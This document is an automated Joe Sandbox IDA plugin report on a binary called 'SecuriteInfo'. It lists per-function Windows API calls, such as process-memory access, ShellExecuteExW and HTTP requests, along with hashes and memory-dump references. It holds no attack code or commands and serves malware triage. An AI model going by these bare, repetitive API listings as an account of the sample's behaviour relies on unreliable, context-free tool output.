                                                                        • API String ID: 708495834-557222456
                                                                        • Opcode ID: ad57006ec1c627c896323e780c1188bc9069f79cba7bd3d755793e69e2ee2a80
                                                                        • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                        • Opcode Fuzzy Hash: ad57006ec1c627c896323e780c1188bc9069f79cba7bd3d755793e69e2ee2a80
                                                                        • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                        APIs
                                                                          • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                          • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                          • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                          • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                          • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                        • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                        • String ID: @
                                                                        • API String ID: 4150878124-2766056989
                                                                        • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                        • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                        • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                        • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: \$]$h
                                                                        • API String ID: 4104443479-3262404753
                                                                        • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                        • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                        • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                        • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                        APIs
                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                        • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                        • String ID: <$@
                                                                        • API String ID: 2417854910-1426351568
                                                                        • Opcode ID: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                                                                        • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                        • Opcode Fuzzy Hash: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                                                                        • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                        APIs
                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                        • String ID:
                                                                        • API String ID: 3705125965-3916222277
                                                                        • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                        • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                        • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                        • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                        APIs
                                                                        • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                        • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                        • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Delete$InfoItem
                                                                        • String ID: 0
                                                                        • API String ID: 135850232-4108050209
                                                                        • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                        • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                        • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                        • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                        APIs
                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Long
                                                                        • String ID: SysTreeView32
                                                                        • API String ID: 847901565-1698111956
                                                                        • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                        • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                        • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                        • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window
                                                                        • String ID: SysMonthCal32
                                                                        • API String ID: 2326795674-1439706946
                                                                        • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                        • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                        • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                        • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                        APIs
                                                                        • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: DestroyWindow
                                                                        • String ID: msctls_updown32
                                                                        • API String ID: 3375834691-2298589950
                                                                        • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                        • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                        • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                        • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: $<
                                                                        • API String ID: 4104443479-428540627
                                                                        • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                        • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                        • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                        • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                        • String ID: \VH
                                                                        • API String ID: 1682464887-234962358
                                                                        • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                        • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                        • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                        • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                        • String ID: \VH
                                                                        • API String ID: 1682464887-234962358
                                                                        • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                        • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                        • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                        • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                        • String ID: \VH
                                                                        • API String ID: 1682464887-234962358
                                                                        • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                        • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                        • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                        • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$InformationVolume
                                                                        • String ID: \VH
                                                                        • API String ID: 2507767853-234962358
                                                                        • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                        • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                        • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                        • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$InformationVolume
                                                                        • String ID: \VH
                                                                        • API String ID: 2507767853-234962358
                                                                        • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                        • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                        • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                        • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                        • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: msctls_trackbar32
                                                                        • API String ID: 3850602802-1010561917
